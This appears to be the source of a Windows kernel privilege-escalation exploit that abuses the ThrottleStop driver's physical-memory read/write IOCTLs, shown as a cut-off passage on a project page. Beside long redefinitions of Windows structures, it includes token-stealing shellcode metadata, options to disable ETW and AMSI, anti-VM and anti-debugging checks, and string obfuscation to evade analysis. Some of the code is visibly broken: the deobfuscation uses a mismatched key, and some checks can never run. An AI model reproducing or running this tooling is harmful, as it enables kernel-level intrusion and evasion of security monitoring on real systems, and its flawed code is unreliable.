README.md
Rendering markdown...
// Author:yuri08
#include <Windows.h>
#include <iostream>
#include <vector>
#include <TlHelp32.h>
#include <winternl.h>
#include <psapi.h>
#include <algorithm>
#include <random>
#include <map>
#include <winhttp.h>
#include <intrin.h>
#include <fstream>
#include <sstream>
#include <winnt.h>
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "winhttp.lib")
#define IOCTL_THROTTLESTOP_V1_READ 0x222000
#define IOCTL_THROTTLESTOP_V1_WRITE 0x222004
#define IOCTL_THROTTLESTOP_V2_READ 0x222010
#define IOCTL_THROTTLESTOP_V2_WRITE 0x222014
#define IOCTL_THROTTLESTOP_V3_READ 0x222020
#define IOCTL_THROTTLESTOP_V3_WRITE 0x222024
#define IOCTL_THROTTLESTOP_V4_READ 0x222030
#define IOCTL_THROTTLESTOP_V4_WRITE 0x222034
#define IOCTL_THROTTLESTOP_V5_READ 0x222040
#define IOCTL_THROTTLESTOP_V5_WRITE 0x222044
#define SYSTEM_PID 4
#define MAX_RETRIES 3
typedef LONG NTSTATUS;
typedef ULONG_PTR KAFFINITY;
typedef PVOID PKTHREAD;
typedef PVOID PEPROCESS;
typedef PVOID PETHREAD;
typedef UCHAR BOOLEAN;
typedef ULONG SIZE_T, *PSIZE_T;
typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif
#ifndef FIELD_OFFSET
#define FIELD_OFFSET(type, field) ((LONG)(LONG_PTR)&(((type *)0)->field))
#endif
#define SystemBasicInformation 0
#define SystemProcessorInformation 1
#define SystemPerformanceInformation 2
#define SystemTimeOfDayInformation 3
#define SystemProcessInformation 5
#define SystemProcessorPerformanceInformation 8
#define SystemHandleInformation 16
#define SystemPagefileInformation 18
#define SystemCacheInformation 21
#define SystemInterruptInformation 23
#define SystemDpcBehaviorInformation 24
#define SystemMemoryInformation 31
#define SystemHandleInformationEx 64
typedef enum _PROCESSINFOCLASS {
ProcessBasicInformation = 0,
ProcessQuotaLimits = 1,
ProcessIoCounters = 2,
ProcessVmCounters = 3,
ProcessTimes = 4,
ProcessBasePriority = 5,
ProcessRaisePriority = 6,
ProcessDebugPort = 7,
ProcessExceptionPort = 8,
ProcessAccessToken = 9,
ProcessLdtInformation = 10,
ProcessLdtSize = 11,
ProcessDefaultHardErrorMode = 12,
ProcessIoPortHandlers = 13,
ProcessPooledUsageAndLimits = 14,
ProcessWorkingSetWatch = 15,
ProcessUserModeIOPL = 16,
ProcessEnableAlignmentFaultFixup = 17,
ProcessPriorityClass = 18,
ProcessWx86Information = 19,
ProcessHandleCount = 20,
ProcessAffinityMask = 21,
ProcessPriorityBoost = 22,
ProcessDeviceMap = 23,
ProcessSessionInformation = 24,
ProcessForegroundInformation = 25,
ProcessWow64Information = 26,
ProcessImageFileName = 27,
ProcessLUIDDeviceMapsEnabled = 28,
ProcessBreakOnTermination = 29,
ProcessDebugObjectHandle = 30,
ProcessDebugFlags = 31,
ProcessHandleTracing = 32,
ProcessIoPriority = 33,
ProcessExecuteFlags = 34,
ProcessResourceManagement = 35,
ProcessCookie = 36,
ProcessImageInformation = 37,
MaxProcessInfoClass
} PROCESSINFOCLASS;
typedef struct _LIST_ENTRY {
struct _LIST_ENTRY *Flink;
struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _PEB_LDR_DATA {
ULONG Length;
BOOLEAN Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID EntryInProgress;
BOOLEAN ShutdownInProgress;
PVOID ShutdownThreadId;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT TlsIndex;
LIST_ENTRY HashLinks;
PVOID SectionPointer;
ULONG CheckSum;
ULONG TimeDateStamp;
PVOID LoadedImports;
PVOID EntryPointActivationContext;
PVOID PatchInformation;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
ULONG MaximumLength;
ULONG Length;
ULONG Flags;
ULONG DebugFlags;
PVOID ConsoleHandle;
ULONG ConsoleFlags;
PVOID StandardInput;
PVOID StandardOutput;
PVOID StandardError;
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PPEB_LDR_DATA Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
BYTE Reserved4[104];
PVOID Reserved5[52];
PVOID PostProcessInitRoutine;
BYTE Reserved6[128];
PVOID Reserved7[1];
ULONG SessionId;
PVOID ImageBaseAddress;
} PEB, *PPEB;
typedef struct _PROCESS_BASIC_INFORMATION {
PVOID Reserved1;
PPEB PebBaseAddress;
PVOID Reserved2[2];
ULONG_PTR UniqueProcessId;
PVOID Reserved3;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
typedef struct _RTL_OSVERSIONINFOW {
ULONG dwOSVersionInfoSize;
ULONG dwMajorVersion;
ULONG dwMinorVersion;
ULONG dwBuildNumber;
ULONG dwPlatformId;
WCHAR szCSDVersion[128];
} RTL_OSVERSIONINFOW, *PRTL_OSVERSIONINFOW;
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
};
ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
SYSTEM_HANDLE_INFORMATION Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;
typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG NextEntryOffset;
ULONG NumberOfThreads;
LARGE_INTEGER Reserved[3];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ImageName;
KPRIORITY BasePriority;
HANDLE UniqueProcessId;
HANDLE InheritedFromUniqueProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
ULONG PrivatePageCount;
VM_COUNTERS VirtualMemoryCounters;
IO_COUNTERS IoCounters;
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} VM_COUNTERS, *PVM_COUNTERS;
typedef struct _IO_COUNTERS {
ULONGLONG ReadOperationCount;
ULONGLONG WriteOperationCount;
ULONGLONG OtherOperationCount;
ULONGLONG ReadTransferCount;
ULONGLONG WriteTransferCount;
ULONGLONG OtherTransferCount;
} IO_COUNTERS, *PIO_COUNTERS;
typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* pNtCreateThreadEx)(
OUT PHANDLE hThread,
IN ACCESS_MASK DesiredAccess,
IN LPVOID ObjectAttributes,
IN HANDLE ProcessHandle,
IN LPTHREAD_START_ROUTINE lpStartAddress,
IN LPVOID lpParameter,
IN BOOL CreateSuspended,
IN ULONG StackZeroBits,
IN ULONG SizeOfStackCommit,
IN ULONG SizeOfStackReserve,
IN LPVOID lpBytesBuffer
);
typedef NTSTATUS(NTAPI* pNtQueryInformationProcess)(
HANDLE ProcessHandle,
PROCESSINFOCLASS ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* pRtlGetVersion)(
OUT PRTL_OSVERSIONINFOW lpVersionInformation
);
typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG_PTR ZeroBits,
IN OUT PSIZE_T RegionSize,
IN ULONG AllocationType,
IN ULONG Protect
);
typedef NTSTATUS(NTAPI* pNtFreeVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN OUT PSIZE_T RegionSize,
IN ULONG FreeType
);
typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID Buffer,
IN SIZE_T NumberOfBytesToWrite,
OUT PSIZE_T NumberOfBytesWritten OPTIONAL
);
typedef NTSTATUS(NTAPI* pNtReadVirtualMemory)(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
OUT PVOID Buffer,
IN SIZE_T NumberOfBytesToRead,
OUT PSIZE_T NumberOfBytesRead OPTIONAL
);
typedef NTSTATUS(NTAPI* pNtProtectVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN OUT PSIZE_T RegionSize,
IN ULONG NewProtect,
OUT PULONG OldProtect
);
typedef NTSTATUS(NTAPI* pNtCreateSection)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PLARGE_INTEGER MaximumSize OPTIONAL,
IN ULONG SectionPageProtection,
IN ULONG AllocationAttributes,
IN HANDLE FileHandle OPTIONAL
);
typedef NTSTATUS(NTAPI* pNtMapViewOfSection)(
IN HANDLE SectionHandle,
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG_PTR ZeroBits,
IN SIZE_T CommitSize,
IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
IN OUT PSIZE_T ViewSize,
IN SECTION_INHERIT InheritDisposition,
IN ULONG AllocationType,
IN ULONG Win32Protect
);
typedef NTSTATUS(NTAPI* pNtUnmapViewOfSection)(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress
);
#define MEM_COMMIT 0x1000
#define MEM_RESERVE 0x2000
#define MEM_FREE 0x10000
#define MEM_PRIVATE 0x20000
#define MEM_MAPPED 0x40000
#define MEM_RESET 0x80000
#define MEM_TOP_DOWN 0x100000
#define MEM_WRITE_WATCH 0x200000
#define MEM_PHYSICAL 0x400000
#define MEM_LARGE_PAGES 0x20000000
#define MEM_4MB_PAGES 0x80000000
#define PAGE_NOACCESS 0x01
#define PAGE_READONLY 0x02
#define PAGE_READWRITE 0x04
#define PAGE_WRITECOPY 0x08
#define PAGE_EXECUTE 0x10
#define PAGE_EXECUTE_READ 0x20
#define PAGE_EXECUTE_READWRITE 0x40
#define PAGE_EXECUTE_WRITECOPY 0x80
#define PAGE_GUARD 0x100
#define PAGE_NOCACHE 0x200
#define PAGE_WRITECOMBINE 0x400
#define MEM_DECOMMIT 0x4000
#define MEM_RELEASE 0x8000
#define SEC_FILE 0x800000
#define SEC_IMAGE 0x1000000
#define SEC_RESERVE 0x4000000
#define SEC_COMMIT 0x8000000
#define SEC_NOCACHE 0x10000000
#define SEC_LARGE_PAGES 0x80000000
#define SEC_NO_CHANGE 0x400000
#define ViewShare 1
#define ViewUnmap 2
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_FORCE_ACCESS_CHECK 0x00000400L
#define OBJ_VALID_ATTRIBUTES 0x000007F2L
#define InitializeObjectAttributes(p, n, a, r, s) { \
(p)->Length = sizeof(OBJECT_ATTRIBUTES); \
(p)->RootDirectory = r; \
(p)->ObjectName = n; \
(p)->Attributes = a; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
typedef NTSTATUS(NTAPI* pNtOpenFile)(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG ShareAccess,
IN ULONG OpenOptions
);
typedef NTSTATUS(NTAPI* pNtReadFile)(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PVOID ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL
);
typedef NTSTATUS(NTAPI* pNtWriteFile)(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PVOID ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL
);
typedef NTSTATUS(NTAPI* pNtClose)(
IN HANDLE Handle
);
#define FILE_READ_DATA 0x0001
#define FILE_WRITE_DATA 0x0002
#define FILE_APPEND_DATA 0x0004
#define FILE_READ_EA 0x0008
#define FILE_WRITE_EA 0x0010
#define FILE_EXECUTE 0x0020
#define FILE_READ_ATTRIBUTES 0x0080
#define FILE_WRITE_ATTRIBUTES 0x0100
#define FILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1FF)
#define FILE_SHARE_READ 0x00000001
#define FILE_SHARE_WRITE 0x00000002
#define FILE_SHARE_DELETE 0x00000004
#define FILE_SUPERSEDE 0x00000000
#define FILE_OPEN 0x00000001
#define FILE_CREATE 0x00000002
#define FILE_OPEN_IF 0x00000003
#define FILE_OVERWRITE 0x00000004
#define FILE_OVERWRITE_IF 0x00000005
#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#define FILE_NON_DIRECTORY_FILE 0x00000040
#define FILE_CREATE_TREE_CONNECTION 0x00000080
#define FILE_COMPLETE_IF_OPLOCKED 0x00000100
#define FILE_NO_EA_KNOWLEDGE 0x00000200
#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
#define FILE_NO_COMPRESSION 0x00008000
#define FILE_RESERVE_OPFILTER 0x00100000
#define FILE_OPEN_REPARSE_POINT 0x00200000
#define FILE_OPEN_NO_RECALL 0x00400000
#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000
#define DELETE 0x00010000L
#define READ_CONTROL 0x00020000L
#define WRITE_DAC 0x00040000L
#define WRITE_OWNER 0x00080000L
#define SYNCHRONIZE 0x00100000L
#define STANDARD_RIGHTS_REQUIRED 0x000F0000L
#define STANDARD_RIGHTS_READ (READ_CONTROL)
#define STANDARD_RIGHTS_WRITE (READ_CONTROL)
#define STANDARD_RIGHTS_EXECUTE (READ_CONTROL)
#define STANDARD_RIGHTS_ALL 0x001F0000L
#define SPECIFIC_RIGHTS_ALL 0x0000FFFFL
#define ACCESS_SYSTEM_SECURITY 0x01000000L
#define MAXIMUM_ALLOWED 0x02000000L
#define GENERIC_READ 0x80000000L
#define GENERIC_WRITE 0x40000000L
#define GENERIC_EXECUTE 0x20000000L
#define GENERIC_ALL 0x10000000L
#ifndef IMAGE_SIZEOF_SHORT_NAME
#define IMAGE_SIZEOF_SHORT_NAME 8
#endif
#ifndef IMAGE_DOS_SIGNATURE
#define IMAGE_DOS_SIGNATURE 0x5A4D
#endif
#ifndef IMAGE_NT_SIGNATURE
#define IMAGE_NT_SIGNATURE 0x00004550
#endif
#ifndef IMAGE_NUMBEROF_DIRECTORY_ENTRIES
#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
#endif
typedef struct _IMAGE_DATA_DIRECTORY {
DWORD VirtualAddress;
DWORD Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;
typedef struct _IMAGE_FILE_HEADER {
WORD Machine;
WORD NumberOfSections;
DWORD TimeDateStamp;
DWORD PointerToSymbolTable;
DWORD NumberOfSymbols;
WORD SizeOfOptionalHeader;
WORD Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
typedef struct _IMAGE_OPTIONAL_HEADER {
WORD Magic;
BYTE MajorLinkerVersion;
BYTE MinorLinkerVersion;
DWORD SizeOfCode;
DWORD SizeOfInitializedData;
DWORD SizeOfUninitializedData;
DWORD AddressOfEntryPoint;
DWORD BaseOfCode;
ULONGLONG ImageBase;
DWORD SectionAlignment;
DWORD FileAlignment;
WORD MajorOperatingSystemVersion;
WORD MinorOperatingSystemVersion;
WORD MajorImageVersion;
WORD MinorImageVersion;
WORD MajorSubsystemVersion;
WORD MinorSubsystemVersion;
DWORD Win32VersionValue;
DWORD SizeOfImage;
DWORD SizeOfHeaders;
DWORD CheckSum;
WORD Subsystem;
WORD DllCharacteristics;
ULONGLONG SizeOfStackReserve;
ULONGLONG SizeOfStackCommit;
ULONGLONG SizeOfHeapReserve;
ULONGLONG SizeOfHeapCommit;
DWORD LoaderFlags;
DWORD NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER, *PIMAGE_OPTIONAL_HEADER;
typedef struct _IMAGE_NT_HEADERS {
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER OptionalHeader;
} IMAGE_NT_HEADERS, *PIMAGE_NT_HEADERS;
typedef struct _IMAGE_SECTION_HEADER {
BYTE Name[IMAGE_SIZEOF_SHORT_NAME];
union {
DWORD PhysicalAddress;
DWORD VirtualSize;
} Misc;
DWORD VirtualAddress;
DWORD SizeOfRawData;
DWORD PointerToRawData;
DWORD PointerToRelocations;
DWORD PointerToLinenumbers;
WORD NumberOfRelocations;
WORD NumberOfLinenumbers;
DWORD Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
typedef struct _IMAGE_DOS_HEADER {
WORD e_magic;
WORD e_cblp;
WORD e_cp;
WORD e_crlc;
WORD e_cparhdr;
WORD e_minalloc;
WORD e_maxalloc;
WORD e_ss;
WORD e_sp;
WORD e_csum;
WORD e_ip;
WORD e_cs;
WORD e_lfarlc;
WORD e_ovno;
WORD e_res[4];
WORD e_oemid;
WORD e_oeminfo;
WORD e_res2[10];
LONG e_lfanew;
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
#ifndef IMAGE_FIRST_SECTION
#define IMAGE_FIRST_SECTION(ntheader) ((PIMAGE_SECTION_HEADER) \
((ULONG_PTR)(ntheader) + \
FIELD_OFFSET(IMAGE_NT_HEADERS, OptionalHeader) + \
((ntheader))->FileHeader.SizeOfOptionalHeader))
#endif
#ifndef CONTEXT_FULL
#define CONTEXT_FULL 0x10007
#endif
typedef struct _M128A {
ULONGLONG Low;
LONGLONG High;
} M128A, *PM128A;
typedef struct _CONTEXT {
DWORD64 P1Home;
DWORD64 P2Home;
DWORD64 P3Home;
DWORD64 P4Home;
DWORD64 P5Home;
DWORD64 P6Home;
DWORD ContextFlags;
DWORD MxCsr;
WORD SegCs;
WORD SegDs;
WORD SegEs;
WORD SegFs;
WORD SegGs;
WORD SegSs;
DWORD EFlags;
DWORD64 Dr0;
DWORD64 Dr1;
DWORD64 Dr2;
DWORD64 Dr3;
DWORD64 Dr6;
DWORD64 Dr7;
DWORD64 Rax;
DWORD64 Rcx;
DWORD64 Rdx;
DWORD64 Rbx;
DWORD64 Rsp;
DWORD64 Rbp;
DWORD64 Rsi;
DWORD64 Rdi;
DWORD64 R8;
DWORD64 R9;
DWORD64 R10;
DWORD64 R11;
DWORD64 R12;
DWORD64 R13;
DWORD64 R14;
DWORD64 R15;
DWORD64 Rip;
union {
struct {
DWORD ControlWord;
DWORD StatusWord;
DWORD TagWord;
DWORD ErrorOffset;
DWORD ErrorSelector;
DWORD DataOffset;
DWORD DataSelector;
DWORD RegisterArea[80];
DWORD Cr0NpxState;
} FltSave;
struct {
M128A Header[2];
M128A Legacy[8];
M128A Xmm0;
M128A Xmm1;
M128A Xmm2;
M128A Xmm3;
M128A Xmm4;
M128A Xmm5;
M128A Xmm6;
M128A Xmm7;
M128A Xmm8;
M128A Xmm9;
M128A Xmm10;
M128A Xmm11;
M128A Xmm12;
M128A Xmm13;
M128A Xmm14;
M128A Xmm15;
} FltSave2;
};
M128A VectorRegister[26];
DWORD64 VectorControl;
DWORD64 DebugControl;
DWORD64 LastBranchToRip;
DWORD64 LastBranchFromRip;
DWORD64 LastExceptionToRip;
DWORD64 LastExceptionFromRip;
} CONTEXT, *PCONTEXT;
#ifndef CREATE_NEW_CONSOLE
#define CREATE_NEW_CONSOLE 0x00000010
#endif
#ifndef THREAD_ALL_ACCESS
#define THREAD_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x3FF)
#endif
typedef struct _IOCTL_PHYS_MEMORY {
ULONG64 PhysicalAddress;
PVOID Buffer;
SIZE_T Size;
} IOCTL_PHYS_MEMORY, *PIOCTL_PHYS_MEMORY;
typedef struct _SHELLCODE_METADATA {
ULONG64 TokenOffset;
ULONG64 UniqueProcessIdOffset;
ULONG64 ActiveProcessLinksOffset;
ULONG64 EPROCESS_Size;
ULONG64 KTHREAD_Offset;
ULONG64 EPROCESS_Offset;
} SHELLCODE_METADATA, *PSHELLCODE_METADATA;
typedef struct _EXPLOIT_CONFIG {
wchar_t TargetProcess[MAX_PATH];
wchar_t CommandLine[MAX_PATH];
DWORD CreationFlags;
BOOL UseStealthMode;
BOOL DisableETW;
BOOL DisableAMSI;
DWORD MaxRetries;
DWORD RandomSleepMin;
DWORD RandomSleepMax;
} EXPLOIT_CONFIG, *PEXPLOIT_CONFIG;
typedef struct _ENCRYPTED_STRING {
BYTE Data[256];
SIZE_T Length;
DWORD Key;
} ENCRYPTED_STRING, *PENCRYPTED_STRING;
typedef struct _ENCRYPTED_API {
char ModuleName[64];
char FunctionName[128];
DWORD Key;
} ENCRYPTED_API, *PENCRYPTED_API;
std::random_device rd;
std::mt19937 gen(rd());
bool g_bStealthMode = true;
DWORD g_dwWindowsVersion = 0;
void RandomSleep() {
if (!g_bStealthMode) return;
std::uniform_int_distribution<> dis(50, 200);
Sleep(dis(gen));
}
bool IsRunningInVMAdvanced() {
if (!g_bStealthMode) return false;
int cpuInfo[4];
__cpuid(cpuInfo, 0x1);
if ((cpuInfo[2] & (1 << 31)) != 0) {
return true;
}
__try {
BYTE invept[] = { 0x66, 0x0F, 0x38, 0x80, 0x00, 0x00, 0x00, 0x00 };
void (*invept_func)() = (void(*)())invept;
invept_func();
} __except(EXCEPTION_EXECUTE_HANDLER) {
return true;
}
HKEY hKey;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"HARDWARE\\DESCRIPTION\\System", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
WCHAR szValue[256];
DWORD dwSize = sizeof(szValue);
if (RegQueryValueEx(hKey, L"SystemBiosVersion", NULL, NULL, (LPBYTE)szValue, &dwSize) == ERROR_SUCCESS) {
if (wcsstr(szValue, L"VMware") || wcsstr(szValue, L"VirtualBox") || wcsstr(szValue, L"Hyper-V")) {
RegCloseKey(hKey);
return true;
}
}
RegCloseKey(hKey);
}
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot != INVALID_HANDLE_VALUE) {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if (_wcsicmp(pe32.szExeFile, L"vmtoolsd.exe") == 0 ||
_wcsicmp(pe32.szExeFile, L"VBoxService.exe") == 0 ||
_wcsicmp(pe32.szExeFile, L"vmware.exe") == 0) {
CloseHandle(hSnapshot);
return true;
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
}
return false;
}
bool IsDebuggerPresentAdvanced() {
if (!g_bStealthMode) return false;
if (::IsDebuggerPresent()) {
return true;
}
static pNtQueryInformationProcess NtQueryInformationProcessPtr = NULL;
if (!NtQueryInformationProcessPtr) {
NtQueryInformationProcessPtr = (pNtQueryInformationProcess)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess");
}
if (NtQueryInformationProcessPtr) {
PVOID debugPort = NULL;
NTSTATUS status = NtQueryInformationProcessPtr(
GetCurrentProcess(),
ProcessDebugPort,
&debugPort,
sizeof(debugPort),
NULL
);
if (NT_SUCCESS(status) && debugPort != NULL) {
return true;
}
}
if (NtQueryInformationProcessPtr) {
ULONG debugFlags = 0;
NTSTATUS status = NtQueryInformationProcessPtr(
GetCurrentProcess(),
ProcessDebugFlags,
&debugFlags,
sizeof(debugFlags),
NULL
);
if (NT_SUCCESS(status) && debugFlags == 0) {
return true;
}
}
if (NtQueryInformationProcessPtr) {
HANDLE debugObjectHandle = NULL;
NTSTATUS status = NtQueryInformationProcessPtr(
GetCurrentProcess(),
ProcessDebugObjectHandle,
&debugObjectHandle,
sizeof(debugObjectHandle),
NULL
);
if (NT_SUCCESS(status) && debugObjectHandle != NULL) {
return true;
}
}
__try {
__debugbreak();
return false;
} __except(EXCEPTION_EXECUTE_HANDLER) {
return true;
}
LARGE_INTEGER frequency;
LARGE_INTEGER start, end;
QueryPerformanceFrequency(&frequency);
QueryPerformanceCounter(&start);
volatile int sum = 0;
for (int i = 0; i < 1000; i++) {
sum += i;
}
QueryPerformanceCounter(&end);
double elapsed = (end.QuadPart - start.QuadPart) * 1000.0 / frequency.QuadPart;
if (elapsed > 0.5) {
return true;
}
__try {
DebugBreak();
return false;
} __except(EXCEPTION_EXECUTE_HANDLER) {
return true;
}
return false;
}
void AdvancedObfuscateString(char* str, size_t len) {
if (!g_bStealthMode) return;
DWORD key1 = GetTickCount() & 0xFF;
for (size_t i = 0; i < len; i++) {
str[i] ^= (key1 + i) & 0xFF;
}
for (size_t i = 0; i < len; i++) {
if (str[i] == 'T') str[i] = '\x54';
else if (str[i] == 'h') str[i] = '\x68';
else if (str[i] == 'r') str[i] = '\x72';
else if (str[i] == 'o') str[i] = '\x6F';
else if (str[i] == 't') str[i] = '\x74';
else if (str[i] == 'l') str[i] = '\x6C';
else if (str[i] == 'e') str[i] = '\x65';
else if (str[i] == 'S') str[i] = '\x53';
else if (str[i] == 'p') str[i] = '\x70';
}
int shift = (key1 % 25) + 1;
for (size_t i = 0; i < len; i++) {
if (str[i] >= 'a' && str[i] <= 'z') {
str[i] = 'a' + (str[i] - 'a' + shift) % 26;
} else if (str[i] >= 'A' && str[i] <= 'Z') {
str[i] = 'A' + (str[i] - 'A' + shift) % 26;
}
}
for (size_t i = 0; i < len / 2; i++) {
char temp = str[i];
str[i] = str[len - i - 1];
str[len - i - 1] = temp;
}
}
void AdvancedDeobfuscateString(char* str, size_t len) {
if (!g_bStealthMode) return;
for (size_t i = 0; i < len / 2; i++) {
char temp = str[i];
str[i] = str[len - i - 1];
str[len - i - 1] = temp;
}
DWORD key1 = GetTickCount() & 0xFF;
int shift = (key1 % 25) + 1;
for (size_t i = 0; i < len; i++) {
if (str[i] >= 'a' && str[i] <= 'z') {
str[i] = 'a' + (str[i] - 'a' - shift + 26) % 26;
} else if (str[i] >= 'A' && str[i] <= 'Z') {
str[i] = 'A' + (str[i] - 'A' - shift + 26) % 26;
}
}
for (size_t i = 0; i < len; i++) {
if (str[i] == '\x54') str[i] = 'T';
else if (str[i] == '\x68') str[i] = 'h';
else if (str[i] == '\x72') str[i] = 'r';
else if (str[i] == '\x6F') str[i] = 'o';
else if (str[i] == '\x74') str[i] = 't';
else if (str[i] == '\x6C') str[i] = 'l';
else if (str[i] == '\x65') str[i] = 'e';
else if (str[i] == '\x53') str[i] = 'S';
else if (str[i] == '\x70') str[i] = 'p';
}
for (size_t i = 0; i < len; i++) {
str[i] ^= (key1 + i) & 0xFF;
}
}
void DecryptString(ENCRYPTED_STRING* encStr, char* outStr) {
if (!encStr || !outStr) return;
for (SIZE_T i = 0; i < encStr->Length; i++) {
outStr[i] = encStr->Data[i] ^ (encStr->Key + i) & 0xFF;
}
outStr[encStr->Length] = '\0';
}
FARPROC GetEncryptedProcAddress(ENCRYPTED_API* encApi) {
if (!encApi) return NULL;
char moduleName[64];
